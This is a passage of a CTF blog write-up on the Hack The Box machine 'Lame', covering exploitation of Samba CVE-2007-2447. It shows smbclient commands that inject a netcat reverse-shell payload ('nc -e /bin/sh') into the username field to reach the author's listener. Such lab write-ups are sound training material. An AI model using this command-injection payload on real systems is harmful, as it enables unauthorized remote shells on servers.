thatvirdiguy/thatvirdiguy.github.io/_posts/2022-02-16-hack-the-box:-lame.md

 Shellcodes: No Results
 ```

+——and voilà!

+That "'Username' map script' Command Execution" looked interesting, so I started reading more on that –  which lead me to [CVE-2007-2447](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447). "[...] allows remote attackers to execute arbitrary commands via shell".
+Perfect.

+I looked it up in Rapid7's Vulnerability & Exploit Database and got a simplied explaination of what makes this vulnerability tick.
+Apparently, passing a username containing shell meta characteres confuses one of the functions that calls external scripts defined in config.
+Or something like that.
+[Here](https://www.samba.org/samba/security/CVE-2007-2447.html) is Samba's blog for this vulnerability on their product and [here](https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script/) is Rapid7's explaination of it.

+I didn't want to use Metasploit on this and just be done with it, though looking at that Rapid7 page, that does seem to be the easiest way to pwn this box.
+[Line 74](https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/samba/usermap_script.rb#L74) of source code linked on that page did give me an idea, though.
+I was hoping something like the following would work——

 ```
 ┌──(thatvirdiguy㉿kali)-[~]
 └─$ smbclient -N \\\\10.10.10.3\\ADMIN$ -U './=`nohup nc -e /bin/sh 10.10.16.4 1234`'
 session setup failed: NT_STATUS_LOGON_FAILURE
 ```
+——but that didn't seem to be the case.
+Here, "nc -e /bin/sh 10.10.16.4 1234" is the payload.
+I was trying to get a reverse shell on my machine (10.10.16.4), on the specified port (1234), but for reasons beyond me, it was wasn't working.
+Until, that is, I stumbled upon [this](https://askubuntu.com/questions/109507/smbclient-getting-nt-status-logon-failure-connecting-to-windows-box) useful discussion over at the Stack Exchange forums.

+Modified my command to the following——

 ```
 ┌──(thatvirdiguy㉿kali)-[~]
 └─$ smbclient -N \\\\10.10.10.3\\ADMIN$ -U DOMAIN/'./=`nohup nc -e /bin/sh 10.10.16.4 1234`'
 ```

+——while I had `nc` listening for connections on port 1234 on another terminal.

 ```
 ┌──(thatvirdiguy㉿kali)-[~]